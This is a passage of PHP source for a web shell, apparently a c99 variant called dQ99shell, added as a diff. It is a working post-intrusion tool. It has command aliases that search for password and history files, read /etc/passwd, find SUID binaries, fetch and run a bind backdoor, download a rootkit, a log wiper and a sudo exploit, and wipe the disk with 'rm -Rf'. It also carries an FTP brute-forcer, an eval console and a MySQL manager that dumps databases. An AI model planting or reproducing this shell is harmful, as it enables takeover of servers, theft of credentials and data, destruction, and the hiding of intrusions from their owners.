writable folders in current dir", "find . -type d -perm -2 -ls"), + array("Find all service.pwd files", "find / -type f -name service.pwd"), + array("Find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("Find all .htpasswd files", "find / -type f -name .htpasswd"), + array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("Find all .bash_history files", "find / -type f -name .bash_history"), + array("Find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("List file attributes on a Linux second extended file system", "lsattr -va"), + array("Show opened ports", "netstat -an | grep -i listen") + ); + $cmdaliases2 = array( + array("wget & extract psyBNC","wget ".$sh_mainurl."dQ.tgz;tar -zxf dQ.tgz"), + array("wget & extract EggDrop","wget ".$sh_mainurl."dQb.tgz;tar -zxf dQb.tgz"), + array("-----",""), + array("Logged in users","w"), + array("Last to connect","lastlog"), + array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"), + array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"), + array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"), + array("Downloaders?","which wget curl w3m lynx fetch lwp-download"), + array("CPU Info","cat /proc/version /proc/cpuinfo"), + array("Is gcc installed ?","locate gcc"), + array("Format box (DANGEROUS)","rm -Rf"), + array("-----",""), + array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"), + array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"), + array("Run WIPELOGS PT3","./zap2"), + array("-----",""), + array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"), + array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"), + array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"), + ); +} +else { + $cmdaliases = array( + array("", "dir"), + array("Find index.php in current dir", "dir /s /w /b index.php"), + array("Find *config*.php in current dir", "dir /s /w /b *config*.php"), + array("Find c99shell in current dir", "find /c \"c99\" *"), + array("Find r57shell in current dir", "find /c \"r57\" *"), + array("Find dQ99shell in current dir", "find /c \"dQ99\" *"), + array("Show active connections", "netstat -an"), + array("Show running services", "net start"), + array("User accounts", "net user"), + array("Show computers", "net view"), + ); +} +## PHP FILESYSTEM TRICKS (By diKi) ## +$phpfsaliases = array( + array("Read File", "read", 1, "File", ""), + array("Write File (PHP5)", "write", 2, "File","Text"), + array("Copy", "copy", 2, "From", "To"), + array("Rename/Move", "rename", 2, "File", "To"), + array("Delete", "delete", 1 ,"File", ""), + array("Make Dir","mkdir", 1, "Dir", ""), + array("Download", "download", 2, "URL", "To"), + array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"), + array("Change Perm (0755)", "chmod", 2, "File", "Perms"), + array("Find Writable Dir", "fwritabledir", 2 ,"Dir"), + array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"), +); +## QUICK LAUNCH ## +$quicklaunch1 = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"Up\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d") +); +$quicklaunch2 = array( + array("Security Info",$surl."act=security&d=%d"), + array("Processes",$surl."act=processes&d=%d"), + array("MySQL",$surl."act=sql&d=%d"), + array("Eval",$surl."act=eval&d=%d"), + array("Encoder",$surl."act=encoder&d=%d"), + array("Mailer",$surl."act=dQmailer"), + array("milw0rm",$millink), + array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"), + array("Toolz",$surl."act=tools&d=%d"), + array("Kill-Shell",$surl."act=selfremove"), + array("Feedback",$surl."act=feedback"), + array("Update",$surl."act=update"), + array("About",$surl."act=about") +); +if (!$win) { + $quicklaunch2[] = array("
        FTP-Brute",$surl."act=ftpquickbrute&d=%d"); +} +## HIGHLIGHT CODE ## +$highlight_background = "#C0C0C0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; +#################### +##[ AUTHENTICATE ]## +#################### +$tmp = array(); +foreach ($auth["hostallow"] as $k => $v) { + $tmp[] = str_replace("\\*",".*",preg_quote($v)); +} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) { + exit("$sh_name: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed"); +} +if (!empty($auth["login"])) { + if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); } + if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) { + header("WWW-Authenticate: Basic realm=\"".$sh_name.": Restricted Area\""); + header("HTTP/1.0 401 Unauthorized"); + die($auth["denied"]); + } +} +## END AUTHENTICATE ## + +if ($act != "img") { + $lastdir = realpath("."); + chdir($curdir); + if ($updatenow) { @ob_clean(); dQ99sh_getupdate(1); exit; } + $sess_data = @unserialize($_COOKIE["$sess_cookie"]); + if (!is_array($sess_data)) { $sess_data = array(); } + if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); } + if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); } + dQ99_buff_prepare(); + foreach (array("sort","sql_sort") as $v) { + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} + } + if ($sort_save) { + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} + } + if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} + if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} + if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} + if (!function_exists("mysql_dump")) { + function mysql_dump($set) { + global $sh_ver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) { + //Retrieve tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = " + # Dumped by ".$sh_name." + # + # Host settings: + # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." + # Date: ".date("d.m.Y H:i:s")." + # DB: \"".$db."\" + #---------------------------------------------------------"; + $c = count($onlytabs); + foreach($tabs as $tab) { + if ((in_array($tab,$onlytabs)) or (!$c)) { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + //Receieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + //Receieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) { + while ($row = mysql_fetch_assoc($res)) { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; + } + } + if (!function_exists("mysql_buildwhere")) { + function mysql_buildwhere($array,$sep=" and",$functs=array()) { + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; + } + } + if (!function_exists("mysql_fetch_all")) { + function mysql_fetch_all($query,$sock) { + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; + } + } + if (!function_exists("mysql_smarterror")) { + function mysql_smarterror($type,$sock) { + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; + } + } + if (!function_exists("mysql_query_form")) { + function mysql_query_form() { + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
        ".$sql_query_error."
        ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) { + echo ""; + if ($tbl_struct) { + echo "
        "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



        Fields:
        "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ ".$name."
        ";} + echo "
        "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} + } + } + if (!function_exists("mysql_create_db")) { + function mysql_create_db($db,$sock="") { + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} + } + } + if (!function_exists("mysql_query_parse")) { + function mysql_query_parse($query) { + $query = trim($query); + $arr = explode (" ",$query); + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) { + foreach($arr as $k=>$v) { + if (strtoupper($v) == "LIMIT") { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} + } + } + if ($act == "gofile") { + if (is_dir($f)) { $act = "ls"; $d = $f; } + else { $act = "f"; $d = dirname($f); $f = basename($f); } + } + ## HEADERS ## + @ob_start(); + @ob_implicit_flush(0); + header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); + header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); + header("Cache-Control: no-store, no-cache, must-revalidate"); + header("Cache-Control: post-check=0, pre-check=0", FALSE); + header("Pragma: no-cache"); + if (empty($tmpdir)) { + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} + } + $tmpdir = realpath($tmpdir); + $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); + if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} + if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} + else {$tmpdir_logs = realpath($tmpdir_logs);} + $sort = htmlspecialchars($sort); + if (empty($sort)) {$sort = $sort_default;} + $sort[1] = strtolower($sort[1]); + $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); + if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} + $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); + @ini_set("highlight.bg",$highlight_bg); + @ini_set("highlight.comment",$highlight_comment); + @ini_set("highlight.default",$highlight_default); + @ini_set("highlight.html",$highlight_html); + @ini_set("highlight.keyword",$highlight_keyword); + @ini_set("highlight.string",$highlight_string); + if (!is_array($actbox)) { $actbox = array(); } + $dspact = $act = htmlspecialchars($act); + $disp_fullpath = $ls_arr = $notls = null; + $ud = @urlencode($d); + if (empty($d)) {$d = realpath(".");} + elseif(realpath($d)) {$d = realpath($d);} + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $d = str_replace("\\\\","\\",$d); + $dispd = htmlspecialchars($d); + $safemode = safemode(); + if ($safemode) { + $hsafemode = "SAFE MODE IS ON"; + $safemodeexecdir = @ini_get("safe_mode_exec_dir"); + } + else { $hsafemode = "SAFE MODE IS OFF"; } + $v = @ini_get("open_basedir"); + if ($v or strtolower($v) == "on") { + $openbasedir = TRUE; + $hopenbasedir = "".$v.""; + } + else { + $openbasedir = FALSE; + $hopenbasedir = "OFF (not secure)"; + } + +################## +##[ HTML START ]## +################## +function srv_info($title,$contents) { + echo "

        $title:$contents
        "; +echo "\n"; +echo "\n". + "\n"; +echo "\n"; +echo "\n"; +echo "\n". + "\n
        \n"; +echo "
        $hsafemode
        \n"; +echo "
        "; +echo "IP Address: ".@gethostbyname($_SERVER["HTTP_HOST"])." ". + "You: ".$_SERVER["REMOTE_ADDR"]." ". + ($win?"Drives: ".disp_drives($d,$surl):""); +echo "
        \n
        \n"; +echo "\n"; +srv_info("Software","".$DISP_SERVER_SOFTWARE); +srv_info("Uname",php_uname()); +srv_info("User",($win) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : dQ99exec("id")); +echo "
        \n"; +echo "\n"; +srv_info("Freespace",disp_freespace($d)); +echo "
        \n"; +echo get_status(); +echo "
        \n"; +echo $safemodeexecdir ? "SafemodeExecDir: ".$safemodeexecdir."
        \n" : ""; +echo showdisfunc() ? "DisFunc: ".showdisfunc()."\n" : ""; +echo "
        "; +echo "

        \n"; +$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); +$i = 0; +foreach($pd as $b) { + $t = ""; $j = 0; + foreach ($e as $r) { + $t.= $r.DIRECTORY_SEPARATOR; + if ($j == $i) { break; } + $j++; + } + echo "".htmlspecialchars($b).DIRECTORY_SEPARATOR."\n"; + $i++; +} +echo " - "; +if (is_writable($d)) { + $wd = TRUE; + $wdt = "[OK]"; + echo "".view_perms(fileperms($d)).""; +} +else { + $wd = FALSE; + $wdt = "[Read-Only]"; + echo "".view_perms_color($d).""; +} +echo "\n

        \n"; +?> +
        +
        +Directory: +
        +
        +
        +\n"; +if ($act == "") { $act = $dspact = "ls"; } +if ($act == "sql") { + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + echo "

        Attention! MySQL Manager is NOT a ready module! Don't reports bugs.

        ". + "". + ""; + if (!$sql_sock) { + echo ""; +} +echo "
        "; + if ($sql_server) { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} + } + else {$sql_sock = FALSE;} + echo ".: SQL Manager :.
        "; + if (!$sql_sock) { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "Can't connect! ".$err;} + } + else { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
        "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + } + echo "
      • If login is null, login is owner of process.
      • If host is null, host is localhost
      • If port is null, port is 3306 (default)
      • "; + echo ""; + } + else { + //Start left panel + if (!empty($sql_db)) { + ?>
        Please, fill the form:
        UsernamePasswordDatabase
        HostPORT
        ">Home
        + ".htmlspecialchars($sql_db)." ]---
        "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "".htmlspecialchars($row[0])." (".$count_row[0].")
        "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else { + ?>
        Home
        +

        Please, select database
        +
        "; + //Start center panel + $diplay = TRUE; + if ($sql_db) { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
        There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
        "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
        "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") { + if ($sql_tbl_insert_radio == 1) { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") { + echo "
        "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
        ".$sql_query_error."
        ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
        "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



        ";} + } + if (in_array($sql_act,$acts)) { + ?> +
        Create new table: +
        + + + + + + + + + +
        Dump DB: +
        + + + + + + ">
        + ";} + if ($sql_act == "newtbl") { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) { + echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
        "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
        Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") { + if (empty($submit)) { + $diplay = FALSE; + echo "
        SQL-Dump:

        "; + echo "DB:

        "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

        "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

        "; + echo "Download:  

        "; + echo "Save to file:  "; + echo "



        1 - all, if empty"; + echo "
        "; + } + else { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) { + if (!empty($sql_tbl)) { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
        Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
        "; + echo "[ Structure ]   "; + echo "[ Browse ]   "; + echo "[ Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

        Coming sooon!";} + if ($sql_tbl_act == "insert") { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) { } //Not Ready + else { + echo "

        Inserting row into table:
        "; + if (!empty($sql_tbl_insert_q)) { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

        ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
        "; + foreach ($tbl_struct_fields as $field) { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
        FieldTypeFunctionValue
        ".htmlspecialchars($name)."".$field["Type"]."

        "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

        "; + } + } + if ($sql_tbl_act == "browse") { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
        "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
        ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
        From:  To:  
        "; + echo "
        "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
        Action
        ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

         

        "; + } + } + else { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
        "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
        Table
        RowsTypeCreatedModifiedSizeAction
         ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
        +
        ".$i." table(s)
        ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

         

        "; + mysql_free_result($result); + } + } + } + } + } + else { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
        Create new DB:
         
        View File:
         
